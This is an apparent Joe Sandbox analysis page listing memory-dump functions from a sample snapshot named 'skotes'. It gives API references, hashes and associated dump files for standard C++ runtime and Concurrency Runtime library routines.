Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 157c80128146c0a04f5ff9b377108d6367347ab20d16198a67e2263ff344caed
Instruction ID: 3edefefde0d57f60fbaa114ec2d2e3fbda5ee72ecf0ff62302485ed331e5b703
Opcode Fuzzy Hash: 157c80128146c0a04f5ff9b377108d6367347ab20d16198a67e2263ff344caed
Instruction Fuzzy Hash: 7F81B031D20219CFCF94DFA8CA81BEEB7B4AF15310F244069E805E7286DB74AD65CB90

Function 002B26D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 002B26E3

Part of subcall function 002B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 002B2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 002B2704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 002B2711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 002B275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 002B27E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 002B27F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 002B2846

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 2db8d006c987bbf6d94d774d4d3b5d4ff7ca70692729e379fc0f03a50c41bd05
Instruction ID: 269c9b9bd7681783575fb9cc91a293046b303df923a21bb62dfdd809587d9d7b
Opcode Fuzzy Hash: 2db8d006c987bbf6d94d774d4d3b5d4ff7ca70692729e379fc0f03a50c41bd05
Instruction Fuzzy Hash: F681AF3491034AEBDF169F54C951BFEBBB1AF56384F040098EC416B252CB728D79EB61

Function 002B2970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 002B2982

Part of subcall function 002B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 002B2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 002B29A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 002B29B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 002B29FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 002B2AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 002B2AD8

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 8f4a79cb7f4ea7c71f26dece71fb35d67445e39edd589a2d14bbf709570010bd
Instruction ID: d088f5a91a35dbe5acfcf87b54f28d7b80e3fcbc38666f87ca3e0bc4a772da94
Opcode Fuzzy Hash: 8f4a79cb7f4ea7c71f26dece71fb35d67445e39edd589a2d14bbf709570010bd
Instruction Fuzzy Hash: 33719B3092034AEBDF15DF54C981BFEBBB5AF55388F044098EC416B252CB319D2ADB61

Function 002A2832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 002A2876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 002A28DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 002A2913

Part of subcall function 002A07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 002A080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 002A2993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 002A29DB

Part of subcall function 002A07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 002A07DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 002A29EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 002A2A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 002A2A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 002A2A7E

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 9bf53e0747126453817af552252920ecf022ce306c17fa57d18afc1e635bd5a6
Instruction ID: 8b537b09a4705ec432aefccf64a437a63ec7929248277ed34342f901c4656940
Opcode Fuzzy Hash: 9bf53e0747126453817af552252920ecf022ce306c17fa57d18afc1e635bd5a6
Instruction Fuzzy Hash: 5E81BF31A70667CBCB18CFACE8D456EB7B5BB4A308B24402DE445AB245DF305D68CB90

Function 002A69DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 002A6A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 002A6A51
List.LIBCONCRT ref: 002A6A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 002A6A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 002A6AB9
List.LIBCONCRT ref: 002A6AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 002A6B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 002A6B20
List.LIBCONCRT ref: 002A6B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 002A6B68

Part of subcall function 002A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 002A5EF7
Part of subcall function 002A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 002A5F09

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: c041c61df51b644c1ea74e6fd403c03dbe0fffdb2221cfd938b9877d6eb05b94
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: 99516F71A1021AAFDF04DF64C599BEDB3A8BF49304F0544A9E915EB282DB30AE54CF90

Function 002B52A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 002B53A0
type_info::operator==.LIBVCRUNTIME ref: 002B53C7
___TypeMatch.LIBVCRUNTIME ref: 002B54D3
IsInExceptionSpec.LIBVCRUNTIME ref: 002B55AE
CallUnexpected.LIBVCRUNTIME ref: 002B5650

Strings

csm, xrefs: 002B52E0
csm, xrefs: 002B534D
csm, xrefs: 002B53FE

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: fd3502de79065fd708de58fcc9e455d4748e5c657f506114babbbbf0016ef0a7
Instruction ID: d568e273a7b23f08c8ac1a8296645be41f9e08c4308f990c93fe030a9cbd4f8f
Opcode Fuzzy Hash: fd3502de79065fd708de58fcc9e455d4748e5c657f506114babbbbf0016ef0a7
Instruction Fuzzy Hash: 14C1687182062ADFCF25DF94D880AEEBBB9AF14395F44415AF8056F202C771DA61CF91

Function 002B4840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002B4877
___except_validate_context_record.LIBVCRUNTIME ref: 002B487F
_ValidateLocalCookies.LIBCMT ref: 002B4908
__IsNonwritableInCurrentImage.LIBCMT ref: 002B4933
_ValidateLocalCookies.LIBCMT ref: 002B4988

Strings

csm, xrefs: 002B491D
S9+, xrefs: 002B4925, 002B492E, 002B493F

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
